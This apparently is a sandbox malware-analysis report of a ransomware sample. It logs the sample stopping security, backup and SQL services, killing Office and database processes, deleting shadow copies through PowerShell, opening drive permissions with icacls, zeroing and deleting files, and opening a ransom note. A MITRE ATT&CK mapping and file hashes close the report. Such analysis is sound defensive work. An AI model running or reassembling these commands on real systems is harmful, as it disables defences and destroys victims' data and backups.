C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos MCS Client” /y
3⤵
PID:2100

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos MCS Client” /y
4⤵
PID:3156

C:\Windows\SysWOW64\net.exe
"net.exe" stop audioendpointbuilder /y
3⤵
PID:2924

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop audioendpointbuilder /y
4⤵
PID:3252

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SYSTEM_BGC /y
3⤵
PID:2084

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y
4⤵
PID:3208

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SOPHOS /y
3⤵
PID:2912

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y
4⤵
PID:3324

C:\Windows\SysWOW64\net.exe
"net.exe" stop ARSM /y
3⤵
PID:3008

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ARSM /y
4⤵
PID:3236

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Safestore Service” /y
3⤵
PID:2060

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Safestore Service” /y
4⤵
PID:3216

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SQLEXPRESS /y
3⤵
PID:2684

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y
4⤵
PID:3280

C:\Windows\SysWOW64\net.exe
"net.exe" stop swi_filter /y
3⤵
PID:2152

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_filter /y
4⤵
PID:3260

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$BKUPEXEC /y
3⤵
PID:2240

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y
4⤵
PID:3312

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecAgentBrowser /y
3⤵
PID:2416

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
4⤵
PID:3396

C:\Windows\SysWOW64\net.exe
"net.exe" stop svcGenericHost /y
3⤵
PID:1812

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop svcGenericHost /y
4⤵
PID:3404

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$TPS /y
3⤵
PID:2324

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$TPS /y
4⤵
PID:3388

C:\Windows\SysWOW64\net.exe
"net.exe" stop unistoresvc_1af40a /y
3⤵
PID:2304

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop unistoresvc_1af40a /y
4⤵
PID:3492

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$PRACTICEMGT /y
3⤵
PID:2432

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
4⤵
PID:3340

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos System Protection Service” /y
3⤵
PID:2260

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos System Protection Service” /y
4⤵
PID:3456

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLTELEMETRY /y
3⤵
PID:664

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY /y
4⤵
PID:3448

C:\Windows\SysWOW64\net.exe
"net.exe" stop swi_service /y
3⤵
PID:2832

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_service /y
4⤵
PID:3484

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Message Router” /y
3⤵
PID:2976

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Message Router” /y
4⤵
PID:3500

C:\Windows\SysWOW64\net.exe
"net.exe" stop TrueKeyServiceHelper /y
3⤵
PID:2920

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TrueKeyServiceHelper /y
4⤵
PID:3680

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecDeviceMediaService /y
3⤵
PID:1528

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
4⤵
PID:3568

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$TPSAMA /y
3⤵
PID:2288

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y
4⤵
PID:3812

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecAgentAccelerator /y
3⤵
PID:2700

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
4⤵
PID:3708

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$PRACTTICEBGC /y
3⤵
PID:2300

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
4⤵
PID:3700

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SBSMONITORING /
3⤵
PID:2072

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /
4⤵
PID:3900

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLTELEMETRY$ECWDB2 /y
3⤵
PID:1380

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y
4⤵
PID:3752

C:\Windows\SysWOW64\net.exe
"net.exe" stop swi_update /y
3⤵
PID:2528

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_update /y
4⤵
PID:4080

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SBSMONITORING /y
3⤵
PID:2156

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
4⤵
PID:4000

C:\Windows\SysWOW64\net.exe
"net.exe" stop WRSVC /y
3⤵
PID:896

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop WRSVC /y
4⤵
PID:3884

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Web Control Service” /y
3⤵
PID:2132

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Web Control Service” /y
4⤵
PID:4088

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
3⤵
PID:872

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
4⤵
PID:3984

C:\Windows\SysWOW64\net.exe
"net.exe" stop AVP /y
3⤵
PID:2944

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AVP /y
4⤵
PID:2860

C:\Windows\SysWOW64\net.exe
"net.exe" stop mssql$vim_sqlexp /y
3⤵
PID:2868

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mssql$vim_sqlexp /y
4⤵
PID:3992

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecJobEngine /y
3⤵
PID:2536

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
4⤵
PID:1524

C:\Windows\SysWOW64\net.exe
"net.exe" stop swi_update_64 /y
3⤵
PID:2176

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_update_64 /y
4⤵
PID:2468

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecVSSProvider /y
3⤵
PID:2292

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
4⤵
PID:3376

C:\Windows\SysWOW64\net.exe
"net.exe" stop vapiendpoint /y
3⤵
PID:2312

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop vapiendpoint /y
4⤵
PID:2760

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$PROD /y
3⤵
PID:2488

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PROD /y
4⤵
PID:3636

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$VEEAMSQL2012 /y
3⤵
PID:2768

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y
4⤵
PID:2480

C:\Windows\SysWOW64\net.exe
"net.exe" stop AcronisAgent /y
3⤵
PID:3036

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
4⤵
PID:804

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SHAREPOINT /y
3⤵
PID:2852

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
4⤵
PID:3928

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecManagementService /y
3⤵
PID:1540

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
4⤵
PID:4100

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$PROFXENGAGEMENT /y
3⤵
PID:1096

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y
4⤵
PID:988

C:\Windows\SysWOW64\net.exe
"net.exe" stop Antivirus /y
3⤵
PID:1964

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Antivirus /y
4⤵
PID:2392

C:\Windows\SysWOW64\net.exe
"net.exe" stop TmCCSF /y
3⤵
PID:2604

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TmCCSF /y
4⤵
PID:2448

C:\Windows\SysWOW64\net.exe
"net.exe" stop DCAgent /y
3⤵
PID:3016

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop DCAgent /y
4⤵
PID:4120

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLSafeOLRService /y
3⤵
PID:1036

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLSafeOLRService /y
4⤵
PID:4184

C:\Windows\SysWOW64\net.exe
"net.exe" stop TrueKey /y
3⤵
PID:2284

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TrueKey /y
4⤵
PID:4212

C:\Windows\SysWOW64\net.exe
"net.exe" stop tmlisten /y
3⤵
PID:2572

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop tmlisten /y
4⤵
PID:4192

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLBrowser /y
3⤵
PID:2540

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLBrowser /y
4⤵
PID:4176

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecRPCService /y
3⤵
PID:2576

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
4⤵
PID:4132

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLSERVERAGENT /y
3⤵
PID:2396

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLSERVERAGENT /y
4⤵
PID:4232

C:\Windows\SysWOW64\net.exe
"net.exe" stop TrueKeyScheduler /y
3⤵
PID:3472

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TrueKeyScheduler /y
4⤵
PID:4304

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3508

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3516

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3524

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM synctime.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3532

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3552

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM outlook.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3624

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM tmlisten.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3640

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM msaccess.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3616

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM PccNTMon.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3608

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM msftesql.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3648

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM onenote.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3600

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM isqlplussvc.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3592

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM Ntrtscan.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3584

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqbcoreservice.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3576

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3560

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM agntsvc.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3720

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM steam.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3728

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM firefoxconfig.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3736

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM powerpnt.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3760

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM visio.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3780

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3768

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld-nt.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3804

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM winword.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3796

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3788

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM thebat.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3820

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM encsvc.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3828

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlwriter.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3836

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM tbirdconfig.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3844

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM wordpad.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3868

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM dbeng50.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3892

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM excel.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3908

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocomm.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3916

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM CNTAoSMgr.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3932

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM thebat64.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3956

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld-opt.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3968

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocautoupds.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4032

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" IM thunderbird.exe /F
3⤵
- Kills process with taskkill
PID:4024

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM infopath.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4008

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocssd.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4048

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM oracle.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4060

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlagent.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4072

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM dbsnmp.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2764

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mbamtray.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2788

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM xfssvccon.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2236

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM zoolz.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3248

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlbrowser.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2472

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlservr.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3296

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:436

C:\Windows\SysWOW64\icacls.exe
"icacls" "C:*" /grant Everyone:F /T /C /Q
3⤵
- Modifies file permissions
PID:528

C:\Windows\SysWOW64\icacls.exe
"icacls" "Z:*" /grant Everyone:F /T /C /Q
3⤵
- Modifies file permissions
PID:2752

C:\Windows\SysWOW64\icacls.exe
"icacls" "D:*" /grant Everyone:F /T /C /Q
3⤵
- Modifies file permissions
PID:3336

C:\Windows\SysWOW64\arp.exe
"arp" -a
3⤵
PID:4280

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.7.0.68
3⤵
PID:4368

C:\Windows\SysWOW64\notepad.exe
"C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt
3⤵
- Opens file in notepad (likely ransom note)
PID:2496

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
3⤵
PID:564

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.7 -n 3
4⤵
- Runs ping.exe
PID:2820

C:\Windows\SysWOW64\fsutil.exe
fsutil file setZeroData offset=0 length=524288 “%s”
4⤵
PID:1600

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Programs\Temp\tm94ra6g.exe
3⤵
PID:1320

C:\Windows\SysWOW64\choice.exe
choice /C Y /N /D Y /T 3
4⤵
PID:3308

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-397736069137260643814032166702119225639234000044-14381712858837510914673125"
1⤵
PID:1508

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "926047565-73045365-2006964149-1563502552-891139590-1356332111-908110634-1624907816"
1⤵
PID:272

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "377858225-1646507739934747386-1946918413-166297252016715441491226537477836607054"
1⤵
PID:2324

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1376091170-1752711824-86991568221072560401818884021-1057853748-382279387-1888604843"
1⤵
PID:2568

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-3342161491893366292-1367908683-2102802502-842945483-229056466-831278535-31699839"
1⤵
PID:2896

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-68351005317098057661206878465602682971627517057-12111272481403850138534124865"
1⤵
PID:2100

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1766752448-11112234741641378731662745025-2082008783-57954410275230572947148860"
1⤵
PID:3056

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "16522290801532845659-1171568132261994351-18593419322003012378-681213493-1241496429"
1⤵
PID:2476

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "12948641561463219945-7248315991827913486-56844313-1211826932-1512949328-1227667825"
1⤵
PID:2472

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "897207674-6101183121402268154-9080635601907790171-1714355089-4556947631066422944"
1⤵
PID:2052

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2110384980-201790247-713877588-7072042531327539839-12388431321117229841-1388745906"
1⤵
PID:1948

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "525483392814966287-1363545317-1207276701-703474035280554792313293833772593546"
1⤵
PID:2924

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1683040199-63259639-1373742495326053-1786159832-6509888384391236481330681361"
1⤵
PID:3036

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1342475832-1029891868-2086608761-1779704363-1700752456-1722782848-13546657361506553982"
1⤵
PID:2568

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "431548572-749331086-1666408465-1494517572-1194691134-812531646-14523630442015205471"
1⤵
PID:776

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "452244431-1826446067139461821-47272471625247953-4900680831385533608-662291239"
1⤵
PID:2864

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1774910837-12513604781001175084-568269211-954448216-17378560415111793392009851210"
1⤵
PID:436

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1768451818-604261798-379903462-1312761622-1887746384-1040005204-153807947659151636"
1⤵
PID:1348

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "8265093561712158203-1289761204-1085612916714977810-24417519054418943331943724"
1⤵
PID:2172

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1792955736-883274299-13587749641962250809-91578201814449180061967826827725008300"
1⤵
PID:1976

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-4059676102107705964-5029568331562425180694393576466379361297110448964775799"
1⤵
PID:1580

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2136771936-14334889061387007168-675993557740812991863635461910172645-1720178521"
1⤵
PID:2668

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "15321828051107238621-909781334-8528961611756660575-59651767011286206-434713887"
1⤵
PID:3048

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-71873458853023427492817035218176732511236164327-1573284172-534712577-1145243295"
1⤵
PID:2596

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1597386004-61102329417474228101607166161105840097-1821003075583409592-238578536"
1⤵
PID:2880

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-8820711261198244922-426439011-18050188071825837283-907887867-1331214128-454161960"
1⤵
PID:2216

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "302288855-751732201-154084979213503465011387619014-1165701839-11594314771259307730"
1⤵
PID:1572

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2091277267744789291029272036-1761450695-2081217884463964335-363369690505662298"
1⤵
PID:3068

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "309512523-10461349112849290691421309796-273536811800432452-173624056-1630595020"
1⤵
PID:1968

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1516104280-1402549396113050076116494675841442037809-3101893121184220684119191360"
1⤵
PID:3040

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2013060251-103773797-225848446-1719360228854943833-537462772554368737233949324"
1⤵
PID:3096

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1497247157-133559788395348476340503359-1354482923-1619447272-4352596871087013302"
1⤵
PID:1700

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1768954169-1449859727624017167174797351618822897071237408352005695654541155512"
1⤵
PID:3184

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "10840895651552369150-631434736-623570896786017394-479893788-14324735031534458207"
1⤵
PID:624

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "856233642-24323958-1874026434737196097-1057118477-10846075891259557681827273030"
1⤵
PID:2280

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt
1⤵
- Opens file in notepad (likely ransom note)
PID:3860

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

File Permissions Modification

T1222

Credential Access

Discovery

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_36403116-80d4-4468-a643-226c7f017487
MD5
354b8209f647a42e2ce36d8cf326cc92

SHA1
98c3117f797df69935f8b09fc9e95accfe3d8346

SHA256
feae405d288fdd38438f9d9b54f791f3ce3805f1bb88780da5aca402ad372239

SHA512
420be869b58e9a7a2c31f2550ac269df832935692a6431d455a10d9b426781e79d91e30ace2c465633b8a7ff2be1bf49734d8b99a390090dc4b36411d4391ff0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3bf4f350-86fe-486e-8b87-41ab96d0ad9c
MD5
b6d38f250ccc9003dd70efd3b778117f

SHA1
d5a17c02cac698d4f0a4a9b7d71db2aa19e3f18a

SHA256
4de9d7b5ccab7b67ca8efc83084c7ee6e5e872b7216ed4683bc5da950bf41265

SHA512
67d8195836b7f280d3f9219fd0f58276342e55d5dfdd8a4c54355030d96685d73f1b2b6da0eb39322ec7c3a1d1c5ef06b52d22646cea30a96f822de1800d31e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4408bb97-19ee-4815-b02c-5a0939dddad8
MD5
df44874327d79bd75e4264cb8dc01811

SHA1
1396b06debed65ea93c24998d244edebd3c0209d

SHA256
55de642c5c9e436ec01c57004dae797022442c3245daf7162d19a5585f221181

SHA512
95dc9298b8db059bbe746f67e6a7f8515781c7053cc60c01532e47623a996be7e1bd23d1bd8f5f2045adff27454f44930d503c15b695690088841cedbd2a06c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_644b5728-e9b5-45ab-9104-7136ec814422
MD5
be4d72095faf84233ac17b94744f7084

SHA1
cc78ce5b9c57573bd214a8f423ee622b00ebb1ec

SHA256
b0d72c5c22e57913476ac8fc686a4593f137c6667d5094522c0a0685dabd7adc

SHA512
